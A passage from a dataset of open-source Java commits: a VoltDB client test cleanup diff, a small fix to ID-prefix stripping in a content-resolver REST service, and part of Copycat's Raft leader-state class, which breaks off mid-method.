volt1.handler.roundTrips.get()); assertEquals(2, volt2.handler.roundTrips.get()); } finally { if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } if (volt2 != null) { volt2.shutdown(); volt2.join(); } } } public void testClient() { MockVolt volt = null; try { // create a fake server and connect to it. volt = new MockVolt(21212); volt.start(); Client clt = ClientFactory.createClient(); clt.createConnection("localhost"); // this call blocks for a result! clt.callProcedure("Foo", new Integer(1)); assertEquals(1, volt.handler.roundTrips.get()); // this call doesn't block! (use drain) clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); clt.drain(); assertEquals(2, volt.handler.roundTrips.get()); } catch (Exception e) { e.printStackTrace(); fail(); } finally { try { if (volt != null) { volt.shutdown(); volt.join(); } } catch(Exception ignored) { ignored.printStackTrace(); } } } @Test public void testClientBlockedOnMaxOutstanding() throws Exception { // create a fake server and connect to it. MockVolt volt0 = new MockVolt(20000); volt0.handleConnection = false; volt0.start(); ClientConfig config = new ClientConfig(); config.setMaxOutstandingTxns(5); final Client client = ClientFactory.createClient(config); client.createConnection("localhost", 20000); final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); final Thread loadThread = new Thread() { @Override public void run() { try { for (int ii = 0; ii < 6; ii++) { client.callProcedure(new NullCallback(), "foo"); counter.incrementAndGet(); } } catch (Exception e) { e.printStackTrace(); } } }; loadThread.start(); final long start = System.currentTimeMillis(); loadThread.join(300); final long finish = System.currentTimeMillis(); assert(finish - start >= 300); assert(counter.get() == 5); volt0.shutdown(); loadThread.stop(); } public void testUnresolvedHost() throws IOException { final String hostname = "doesnotexist"; boolean threwException = false; try { ConnectionUtil.getAuthenticatedConnection(hostname, "", new byte[0], 32); } catch (java.net.UnknownHostException e) { threwException = true; assertTrue(e.getMessage().equals(hostname)); } assertTrue(threwException); } }
Cleanup intermittant testcase some. 1. Close all volt instances using finally blocks 2. Let test cases throw instead of swallowing exceptions.
tests/frontend/org/voltdb/client/TestDistributer.java
Cleanup intermittant testcase some.
<ide><path>ests/frontend/org/voltdb/client/TestDistributer.java <ide> <ide> import java.io.IOException; <ide> import java.net.InetSocketAddress; <del>import java.net.UnknownHostException; <ide> import java.nio.ByteBuffer; <ide> import java.nio.channels.ServerSocketChannel; <ide> import java.nio.channels.SocketChannel; <ide> // A fake server. <ide> class MockVolt extends Thread { <ide> boolean handleConnection = true; <del> MockVolt(int port) { <del> try { <del> network = new VoltNetwork(); <del> network.start(); <del> socket = ServerSocketChannel.open(); <del> socket.configureBlocking(false); <del> socket.socket().bind(new InetSocketAddress(port)); <del> } catch (IOException e) { <del> e.printStackTrace(); <del> } <add> MockVolt(int port) throws IOException { <add> network = new VoltNetwork(); <add> network.start(); <add> socket = ServerSocketChannel.open(); <add> socket.configureBlocking(false); <add> socket.socket().bind(new InetSocketAddress(port)); <ide> } <ide> <ide> @Override <ide> <ide> <ide> @Test <del> public void testCreateConnection() throws InterruptedException { <add> public void testCreateConnection() throws Exception { <ide> MockVolt volt0 = null; <ide> MockVolt volt1 = null; <del> <del> // create a fake server and connect to it. <del> volt0 = new MockVolt(20000); <del> volt0.start(); <del> <del> volt1 = new MockVolt(20001); <del> volt1.start(); <del> <del> assertTrue(volt1.socket.isOpen()); <del> assertTrue(volt0.socket.isOpen()); <del> <del> // And a distributer <del> Distributer dist = new Distributer(); <ide> try { <add> // create a fake server and connect to it. <add> volt0 = new MockVolt(20000); <add> volt0.start(); <add> <add> volt1 = new MockVolt(20001); <add> volt1.start(); <add> <add> assertTrue(volt1.socket.isOpen()); <add> assertTrue(volt0.socket.isOpen()); <add> <add> // And a distributer <add> Distributer dist = new Distributer(); <ide> dist.createConnection("localhost", "", "", 20000); <ide> dist.createConnection("localhost", "", "", 20001); <del> } catch (UnknownHostException e) { <del> e.printStackTrace(); <del> fail(); <del> } catch (IOException e) { <del> e.printStackTrace(); <del> fail(); <del> } <del> <del> Thread.sleep(1000); <del> assertTrue(volt1.handler != null); <del> assertTrue(volt0.handler != null); <del> <del> if (volt0 != null) { <del> volt0.shutdown(); <del> volt0.join(); <del> } <del> if (volt1 != null) { <del> volt1.shutdown(); <del> volt1.join(); <add> <add> Thread.sleep(1000); <add> assertTrue(volt1.handler != null); <add> assertTrue(volt0.handler != null); <add> } <add> finally { <add> if (volt0 != null) { <add> volt0.shutdown(); <add> volt0.join(); <add> } <add> if (volt1 != null) { <add> volt1.shutdown(); <add> volt1.join(); <add> } <ide> } <ide> } <ide> <ide> } <ide> } <ide> <del> public void testClient() { <add> public void testClient() throws Exception { <ide> MockVolt volt = null; <ide> <del> try { <del> // create a fake server and connect to it. <del> volt = new MockVolt(21212); <del> volt.start(); <del> <del> Client clt = ClientFactory.createClient(); <del> clt.createConnection("localhost"); <del> <del> // this call blocks for a result! <del> clt.callProcedure("Foo", new Integer(1)); <del> assertEquals(1, volt.handler.roundTrips.get()); <del> <del> // this call doesn't block! (use drain) <del> clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); <del> clt.drain(); <del> assertEquals(2, volt.handler.roundTrips.get()); <del> <del> } catch (Exception e) { <del> e.printStackTrace(); <del> fail(); <del> } <del> finally { <del> try { <del> if (volt != null) { <del> volt.shutdown(); <del> volt.join(); <del> } <del> } catch(Exception ignored) { <del> ignored.printStackTrace(); <del> } <del> } <add> try { <add> // create a fake server and connect to it. <add> volt = new MockVolt(21212); <add> volt.start(); <add> <add> Client clt = ClientFactory.createClient(); <add> clt.createConnection("localhost"); <add> <add> // this call blocks for a result! <add> clt.callProcedure("Foo", new Integer(1)); <add> assertEquals(1, volt.handler.roundTrips.get()); <add> <add> // this call doesn't block! (use drain) <add> clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); <add> clt.drain(); <add> assertEquals(2, volt.handler.roundTrips.get()); <add> } <add> finally { <add> if (volt != null) { <add> volt.shutdown(); <add> volt.join(); <add> } <add> } <ide> } <ide> <ide> @Test <ide> // create a fake server and connect to it. <ide> MockVolt volt0 = new MockVolt(20000); <ide> volt0.handleConnection = false; <del> volt0.start(); <del> <del> ClientConfig config = new ClientConfig(); <del> config.setMaxOutstandingTxns(5); <del> <del> final Client client = ClientFactory.createClient(config); <del> client.createConnection("localhost", 20000); <del> <del> final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); <del> final Thread loadThread = new Thread() { <del> @Override <del> public void run() { <del> try { <del> for (int ii = 0; ii < 6; ii++) { <del> client.callProcedure(new NullCallback(), "foo"); <del> counter.incrementAndGet(); <add> try { <add> volt0.start(); <add> <add> ClientConfig config = new ClientConfig(); <add> config.setMaxOutstandingTxns(5); <add> <add> final Client client = ClientFactory.createClient(config); <add> client.createConnection("localhost", 20000); <add> <add> final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); <add> final Thread loadThread = new Thread() { <add> @Override <add> public void run() { <add> try { <add> for (int ii = 0; ii < 6; ii++) { <add> client.callProcedure(new NullCallback(), "foo"); <add> counter.incrementAndGet(); <add> } <add> } catch (Exception e) { <add> e.printStackTrace(); <ide> } <del> } catch (Exception e) { <del> e.printStackTrace(); <ide> } <del> } <del> }; <del> loadThread.start(); <del> <del> final long start = System.currentTimeMillis(); <del> loadThread.join(300); <del> final long finish = System.currentTimeMillis(); <del> assert(finish - start >= 300); <del> assert(counter.get() == 5); <del> volt0.shutdown(); <del> loadThread.stop(); <add> }; <add> loadThread.start(); <add> <add> final long start = System.currentTimeMillis(); <add> loadThread.join(300); <add> final long finish = System.currentTimeMillis(); <add> assert(finish - start >= 300); <add> assert(counter.get() == 5); <add> loadThread.stop(); <add> } <add> finally { <add> volt0.shutdown(); <add> } <ide> } <ide> <ide> public void testUnresolvedHost() throws IOException {
Java
apache-2.0
49d2f6e16157d3e67ab2447407ef4118685a8dec
0
statsbiblioteket/content-resolver
package dk.statsbiblioteket.medieplatform.contentresolver.service; /* * #%L * content-resolver-service * %% * Copyright (C) 2012 The State and University Library, Denmark * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import dk.statsbiblioteket.medieplatform.contentresolver.lib.ConfigurableContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.lib.ContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.model.Content; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.MediaType; import java.util.HashMap; import java.util.List; import java.util.Map; @Path("/") public class ContentResolverService { private final ContentResolver contentResolver; public ContentResolverService() { this.contentResolver = new ConfigurableContentResolver(); } /** * Given a PID, return a list of content disseminations. * * @param ids The ids of the content to lookup. * @return Dissemination of the content. */ @GET @Path("content/") //@Produces({"application/json"}) @Produces(MediaType.APPLICATION_JSON) public Map<String,Content> getContent(@QueryParam("id") List<String> ids) { Map<String,Content> idContentPairs = new HashMap<String,Content>(); for (String id : ids) { String originalId = id; Content content = new Content(); // Remove prefixed "uuid:" if it is there if (id.contains(":")) { id = id.substring(id.lastIndexOf(':') + 1); } content.setResources(contentResolver.getContent(id) .getResources()); idContentPairs.put(originalId, content); } return idContentPairs; } }
content-resolver-service/src/main/java/dk/statsbiblioteket/medieplatform/contentresolver/service/ContentResolverService.java
package dk.statsbiblioteket.medieplatform.contentresolver.service; /* * #%L * content-resolver-service * %% * Copyright (C) 2012 The State and University Library, Denmark * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import dk.statsbiblioteket.medieplatform.contentresolver.lib.ConfigurableContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.lib.ContentResolver; import dk.statsbiblioteket.medieplatform.contentresolver.model.Content; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.QueryParam; import javax.ws.rs.core.MediaType; import java.util.HashMap; import java.util.List; import java.util.Map; @Path("/") public class ContentResolverService { private final ContentResolver contentResolver; public ContentResolverService() { this.contentResolver = new ConfigurableContentResolver(); } /** * Given a PID, return a list of content disseminations. * * @param ids The ids of the content to lookup. * @return Dissemination of the content. */ @GET @Path("content/") //@Produces({"application/json"}) @Produces(MediaType.APPLICATION_JSON) public Map<String,Content> getContent(@QueryParam("id") List<String> ids) { Map<String,Content> idContentPairs = new HashMap<String,Content>(); for (String id : ids) { String originalId = id; Content content = new Content(); // Remove prefixed "uuid:" if it is there if (id.contains(":")) { id = id.substring(id.indexOf(':') + 1); } content.setResources(contentResolver.getContent(id) .getResources()); idContentPairs.put(originalId, content); } return idContentPairs; } }
Ignore entire prefix of id's, not just until the first :
content-resolver-service/src/main/java/dk/statsbiblioteket/medieplatform/contentresolver/service/ContentResolverService.java
Ignore entire prefix of id's, not just until the first :
<ide><path>ontent-resolver-service/src/main/java/dk/statsbiblioteket/medieplatform/contentresolver/service/ContentResolverService.java <ide> Content content = new Content(); <ide> // Remove prefixed "uuid:" if it is there <ide> if (id.contains(":")) { <del> id = id.substring(id.indexOf(':') + 1); <add> id = id.substring(id.lastIndexOf(':') + 1); <ide> } <ide> <ide> content.setResources(contentResolver.getContent(id)
Java
apache-2.0
74ede115169a4ecdef0b6f7fcc5f6c2fe8a3a78f
0
atomix/copycat,atomix/copycat
/* * Copyright 2015 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.atomix.copycat.server.state; import io.atomix.catalyst.concurrent.ComposableFuture; import io.atomix.catalyst.concurrent.Scheduled; import io.atomix.catalyst.transport.Connection; import io.atomix.catalyst.util.Assert; import io.atomix.copycat.Command; import io.atomix.copycat.Query; import io.atomix.copycat.error.CopycatError; import io.atomix.copycat.error.CopycatException; import io.atomix.copycat.protocol.*; import io.atomix.copycat.server.CopycatServer; import io.atomix.copycat.server.cluster.Member; import io.atomix.copycat.server.protocol.*; import io.atomix.copycat.server.storage.entry.*; import io.atomix.copycat.server.storage.system.Configuration; import io.atomix.copycat.session.Session; import java.time.Duration; import java.time.Instant; import java.util.Collection; import java.util.concurrent.CompletableFuture; import java.util.concurrent.CompletionException; import java.util.stream.Collectors; /** * Leader state. * * @author <a href="http://github.com/kuujo">Jordan Halterman</a> */ final class LeaderState extends ActiveState { // Max request queue size *per session* - necessary to limit the stack size private static final int MAX_REQUEST_QUEUE_SIZE = 100; private final LeaderAppender appender; private Scheduled appendTimer; private long configuring; public LeaderState(ServerContext context) { super(context); this.appender = new LeaderAppender(this); } @Override public CopycatServer.State type() { return CopycatServer.State.LEADER; } @Override public synchronized CompletableFuture<ServerState> open() { // Reset state for the leader. takeLeadership(); // Append initial entries to the log, including an initial no-op entry and the server's configuration. appendInitialEntries(); // Commit the initial leader entries. commitInitialEntries(); return super.open() .thenRun(this::startAppendTimer) .thenApply(v -> this); } /** * Sets the current node as the cluster leader. */ private void takeLeadership() { context.setLeader(context.getCluster().member().id()); context.getClusterState().getRemoteMemberStates().forEach(m -> m.resetState(context.getLog())); } /** * Appends initial entries to the log to take leadership. */ private void appendInitialEntries() { final long term = context.getTerm(); // Append a no-op entry to reset session timeouts and commit entries from prior terms. try (InitializeEntry entry = context.getLog().create(InitializeEntry.class)) { entry.setTerm(term) .setTimestamp(appender.time()); Assert.state(context.getLog().append(entry) == appender.index(), "Initialize entry not appended at the start of the leader's term"); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Append a configuration entry to propagate the leader's cluster configuration. configure(context.getCluster().members()); } /** * Commits a no-op entry to the log, ensuring any entries from a previous term are committed. */ private CompletableFuture<Void> commitInitialEntries() { // The Raft protocol dictates that leaders cannot commit entries from previous terms until // at least one entry from their current term has been stored on a majority of servers. Thus, // we force entries to be appended up to the leader's no-op entry. The LeaderAppender will ensure // that the commitIndex is not increased until the no-op entry (appender.index()) is committed. CompletableFuture<Void> future = new CompletableFuture<>(); appender.appendEntries(appender.index()).whenComplete((resultIndex, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { context.getStateMachine().apply(resultIndex); future.complete(null); } else { context.setLeader(0); context.transition(CopycatServer.State.FOLLOWER); } } }); return future; } /** * Starts sending AppendEntries requests to all cluster members. */ private void startAppendTimer() { // Set a timer that will be used to periodically synchronize with other nodes // in the cluster. This timer acts as a heartbeat to ensure this node remains // the leader. LOGGER.debug("{} - Starting append timer", context.getCluster().member().address()); appendTimer = context.getThreadContext().schedule(Duration.ZERO, context.getHeartbeatInterval(), this::appendMembers); } /** * Sends AppendEntries requests to members of the cluster that haven't heard from the leader in a while. */ private void appendMembers() { context.checkThread(); if (isOpen()) { appender.appendEntries(); } } /** * Checks to determine whether any sessions have expired. * <p> * Copycat allows only leaders to explicitly unregister sessions due to expiration. This ensures * that sessions cannot be expired by lengthy election periods or other disruptions to time. * To do so, the leader periodically iterates through registered sessions and checks for sessions * that have been marked suspicious. The internal state machine marks sessions as suspicious when * keep alive entries are not committed for longer than the session timeout. Once the leader marks * a session as suspicious, it will log and replicate an {@link UnregisterEntry} to unregister the session. */ private void checkSessions() { long term = context.getTerm(); // Iterate through all currently registered sessions. for (ServerSessionContext session : context.getStateMachine().executor().context().sessions().sessions.values()) { // If the session isn't already being unregistered by this leader and a keep-alive entry hasn't // been committed for the session in some time, log and commit a new UnregisterEntry. if (session.state() == Session.State.UNSTABLE && !session.isUnregistering()) { LOGGER.debug("{} - Detected expired session: {}", context.getCluster().member().address(), session.id()); // Log the unregister entry, indicating that the session was explicitly unregistered by the leader. // This will result in state machine expire() methods being called when the entry is applied. final long index; try (UnregisterEntry entry = context.getLog().create(UnregisterEntry.class)) { entry.setTerm(term) .setSession(session.id()) .setExpired(true) .setTimestamp(System.currentTimeMillis()); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Commit the unregister entry and apply it to the state machine. appender.appendEntries(index).whenComplete((result, error) -> { if (isOpen()) { context.getStateMachine().apply(index); } }); // Mark the session as being unregistered in order to ensure this leader doesn't attempt // to unregister it again. session.unregister(); } } } /** * Returns a boolean value indicating whether a configuration is currently being committed. * * @return Indicates whether a configuration is currently being committed. */ boolean configuring() { return configuring > 0; } /** * Returns a boolean value indicating whether the leader is still being initialized. * * @return Indicates whether the leader is still being initialized. */ boolean initializing() { // If the leader index is 0 or is greater than the commitIndex, do not allow configuration changes. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E return appender.index() == 0 || context.getCommitIndex() < appender.index(); } /** * Commits the given configuration. */ protected CompletableFuture<Long> configure(Collection<Member> members) { final long index; try (ConfigurationEntry entry = context.getLog().create(ConfigurationEntry.class)) { entry.setTerm(context.getTerm()) .setTimestamp(System.currentTimeMillis()) .setMembers(members); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); // Store the index of the configuration entry in order to prevent other configurations from // being logged and committed concurrently. This is an important safety property of Raft. configuring = index; context.getClusterState().configure(new Configuration(entry.getIndex(), entry.getTerm(), entry.getTimestamp(), entry.getMembers())); } return appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { // Reset the configuration index to allow new configuration changes to be committed. configuring = 0; } }); } @Override public CompletableFuture<JoinResponse> join(final JoinRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is already a known member of the cluster, complete the join successfully. if (context.getCluster().member(request.member().id()) != null) { return CompletableFuture.completedFuture(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(context.getClusterState().getConfiguration().index()) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); // Add the joining member to the members list. If the joining member's type is ACTIVE, join the member in the // PROMOTABLE state to allow it to get caught up without impacting the quorum size. Collection<Member> members = context.getCluster().members(); members.add(new ServerMember(member.type(), member.serverAddress(), member.clientAddress(), Instant.now())); CompletableFuture<JoinResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(JoinResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<ReconfigureResponse> reconfigure(final ReconfigureRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the promote requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the member is not a known member of the cluster, fail the promotion. ServerMember existingMember = context.getClusterState().member(request.member().id()); if (existingMember == null) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } // If the configuration request index is less than the last known configuration index for // the leader, fail the request to ensure servers can't reconfigure an old configuration. if (request.index() > 0 && request.index() < context.getClusterState().getConfiguration().index() || request.term() != context.getClusterState().getConfiguration().term() && (existingMember.type() != request.member().type() || existingMember.status() != request.member().status())) { return CompletableFuture.completedFuture(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.CONFIGURATION_ERROR) .build())); } Member member = request.member(); // If the client address is being set or has changed, update the configuration. if (member.clientAddress() != null && (existingMember.clientAddress() == null || !existingMember.clientAddress().equals(member.clientAddress()))) { existingMember.update(member.clientAddress(), Instant.now()); } // Update the member type. existingMember.update(request.member().type(), Instant.now()); Collection<Member> members = context.getCluster().members(); CompletableFuture<ReconfigureResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(ReconfigureResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<LeaveResponse> leave(final LeaveRequest request) { context.checkThread(); logRequest(request); // If another configuration change is already under way, reject the configuration. // If the leader index is 0 or is greater than the commitIndex, reject the join requests. // Configuration changes should not be allowed until the leader has committed a no-op entry. // See https://groups.google.com/forum/#!topic/raft-dev/t4xj6dJTP6E if (configuring() || initializing()) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .build())); } // If the leaving member is not a known member of the cluster, complete the leave successfully. if (context.getCluster().member(request.member().id()) == null) { return CompletableFuture.completedFuture(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withMembers(context.getCluster().members()) .build())); } Member member = request.member(); Collection<Member> members = context.getCluster().members(); members.remove(member); CompletableFuture<LeaveResponse> future = new CompletableFuture<>(); configure(members).whenComplete((index, error) -> { context.checkThread(); if (isOpen()) { if (error == null) { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.OK) .withIndex(index) .withTerm(context.getClusterState().getConfiguration().term()) .withTime(context.getClusterState().getConfiguration().time()) .withMembers(members) .build())); } else { future.complete(logResponse(LeaveResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build())); } } }); return future; } @Override public CompletableFuture<PollResponse> poll(final PollRequest request) { logRequest(request); // If a member sends a PollRequest to the leader, that indicates that it likely healed from // a network partition and may have had its status set to UNAVAILABLE by the leader. In order // to ensure heartbeats are immediately stored to the member, update its status if necessary. ServerMember member = context.getClusterState().getRemoteMember(request.candidate()); if (member != null && member.status() == Member.Status.UNAVAILABLE) { member.update(Member.Status.AVAILABLE, Instant.now()); configure(context.getCluster().members()); } return CompletableFuture.completedFuture(logResponse(PollResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withAccepted(false) .build())); } @Override public CompletableFuture<VoteResponse> vote(final VoteRequest request) { if (updateTermAndLeader(request.term(), 0)) { LOGGER.debug("{} - Received greater term", context.getCluster().member().address()); context.transition(CopycatServer.State.FOLLOWER); return super.vote(request); } else { logRequest(request); return CompletableFuture.completedFuture(logResponse(VoteResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withVoted(false) .build())); } } @Override public CompletableFuture<AppendResponse> append(final AppendRequest request) { context.checkThread(); if (updateTermAndLeader(request.term(), request.leader())) { CompletableFuture<AppendResponse> future = super.append(request); context.transition(CopycatServer.State.FOLLOWER); return future; } else if (request.term() < context.getTerm()) { logRequest(request); return CompletableFuture.completedFuture(logResponse(AppendResponse.builder() .withStatus(Response.Status.OK) .withTerm(context.getTerm()) .withSucceeded(false) .withLogIndex(context.getLog().lastIndex()) .build())); } else { context.setLeader(request.leader()).transition(CopycatServer.State.FOLLOWER); return super.append(request); } } @Override public CompletableFuture<CommandResponse> command(final CommandRequest request) { context.checkThread(); logRequest(request); // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(request.session()); if (session == null) { return CompletableFuture.completedFuture(logResponse(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } ComposableFuture<CommandResponse> future = new ComposableFuture<>(); sequenceCommand(request, session, future); return future.thenApply(this::logResponse); } /** * Sequences the given command to the log. */ private void sequenceCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { // If the command is LINEARIZABLE and the session's current sequence number is less then one prior to the request // sequence number, queue this request for handling later. We want to handle command requests in the order in which // they were sent by the client. Note that it's possible for the session sequence number to be greater than the request // sequence number. In that case, it's likely that the command was submitted more than once to the // cluster, and the command will be deduplicated once applied to the state machine. if (request.sequence() > session.nextRequestSequence()) { // If the request sequence number is more than 1k requests above the last sequenced request, reject the request. // The client should resubmit a request that fails with a COMMAND_ERROR. if (request.sequence() - session.getRequestSequence() > MAX_REQUEST_QUEUE_SIZE) { future.complete(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.COMMAND_ERROR) .build()); } // Register the request in the request queue if it's not too far ahead of the current sequence number. else { session.registerRequest(request.sequence(), () -> applyCommand(request, session, future)); } } else { applyCommand(request, session, future); } } /** * Applies the given command to the log. */ private void applyCommand(CommandRequest request, ServerSessionContext session, CompletableFuture<CommandResponse> future) { final Command command = request.command(); final long term = context.getTerm(); final long timestamp = System.currentTimeMillis(); final long index; // Create a CommandEntry and append it to the log. try (CommandEntry entry = context.getLog().create(CommandEntry.class)) { entry.setTerm(term) .setSession(request.session()) .setTimestamp(timestamp) .setSequence(request.sequence()) .setCommand(command); index = context.getLog().append(entry); LOGGER.debug("{} - Appended {}", context.getCluster().member().address(), entry); } // Replicate the command to followers. appendCommand(index, future); // Set the last processed request for the session. This will cause sequential command callbacks to be executed. session.setRequestSequence(request.sequence()); } /** * Sends append requests for a command to followers. */ private void appendCommand(long index, CompletableFuture<CommandResponse> future) { appender.appendEntries(index).whenComplete((commitIndex, commitError) -> { context.checkThread(); if (isOpen()) { if (commitError == null) { applyCommand(index, future); } else { future.complete(CommandResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.INTERNAL_ERROR) .build()); } } }); } /** * Applies a command to the state machine. */ private void applyCommand(long index, CompletableFuture<CommandResponse> future) { context.getStateMachine().<ServerStateMachine.Result>apply(index).whenComplete((result, error) -> { if (isOpen()) { completeOperation(result, CommandResponse.builder(), error, future); } }); } @Override public CompletableFuture<QueryResponse> query(final QueryRequest request) { Query query = request.query(); final long timestamp = System.currentTimeMillis(); context.checkThread(); logRequest(request); QueryEntry entry = context.getLog().create(QueryEntry.class) .setIndex(request.index()) .setTerm(context.getTerm()) .setTimestamp(timestamp) .setSession(request.session()) .setSequence(request.sequence()) .setQuery(query); return query(entry).thenApply(this::logResponse); } /** * Applies the given query entry to the state machine according to the query's consistency level. */ private CompletableFuture<QueryResponse> query(QueryEntry entry) { Query.ConsistencyLevel consistency = entry.getQuery().consistency(); if (consistency == null) return queryLinearizable(entry); switch (consistency) { case SEQUENTIAL: return queryLocal(entry); case LINEARIZABLE_LEASE: return queryBoundedLinearizable(entry); case LINEARIZABLE: return queryLinearizable(entry); default: throw new IllegalStateException("unknown consistency level"); } } /** * Executes a bounded linearizable query. * <p> * Bounded linearizable queries succeed as long as this server remains the leader. This is possible * since the leader will step down in the event it fails to contact a majority of the cluster. */ private CompletableFuture<QueryResponse> queryBoundedLinearizable(QueryEntry entry) { return sequenceAndApply(entry); } /** * Executes a linearizable query. * <p> * Linearizable queries are first sequenced with commands and then applied to the state machine. Once * applied, we verify the node's leadership prior to responding successfully to the query. */ private CompletableFuture<QueryResponse> queryLinearizable(QueryEntry entry) { return sequenceAndApply(entry) .thenCompose(response -> appender.appendEntries() .thenApply(index -> response) .exceptionally(error -> QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.QUERY_ERROR) .build())); } /** * Sequences and applies the given query entry. */ private CompletableFuture<QueryResponse> sequenceAndApply(QueryEntry entry) { // Get the client's server session. If the session doesn't exist, return an unknown session error. ServerSessionContext session = context.getStateMachine().executor().context().sessions().getSession(entry.getSession()); if (session == null) { return CompletableFuture.completedFuture(logResponse(QueryResponse.builder() .withStatus(Response.Status.ERROR) .withError(CopycatError.Type.UNKNOWN_SESSION_ERROR) .build())); } CompletableFuture<QueryResponse> future = new CompletableFuture<>(); // If the query's sequence number is greater than the session's current sequence number, queue the request for // handling once the state machine is caught up. if (entry.getSequence() > session.getCommandSequence()) { session.registerSequenceQuery(entry.getSequence(), () -> applyQuery(entry, future)); } else { applyQuery(entry, future); } return future; } @Override public CompletableFuture<RegisterResponse> register(RegisterRequest request) { final long timestamp = System.currentTimeMillis(); final long index; // If the client submitted a session timeout, use the client's timeout, otherwise use the configured // default server session timeout. final long timeout; if (request.timeout() != 0) { timeout = request.timeout(); } else { timeout = context.getSessionTimeout().toMillis(); } context.checkThread(); logRequest(request); // The timeout is logged in the RegisterEntry to ensure that all nodes see a consistent timeout for the session. try (RegisterEntry entry = context.getLog().create(RegisterEntry.class)) { 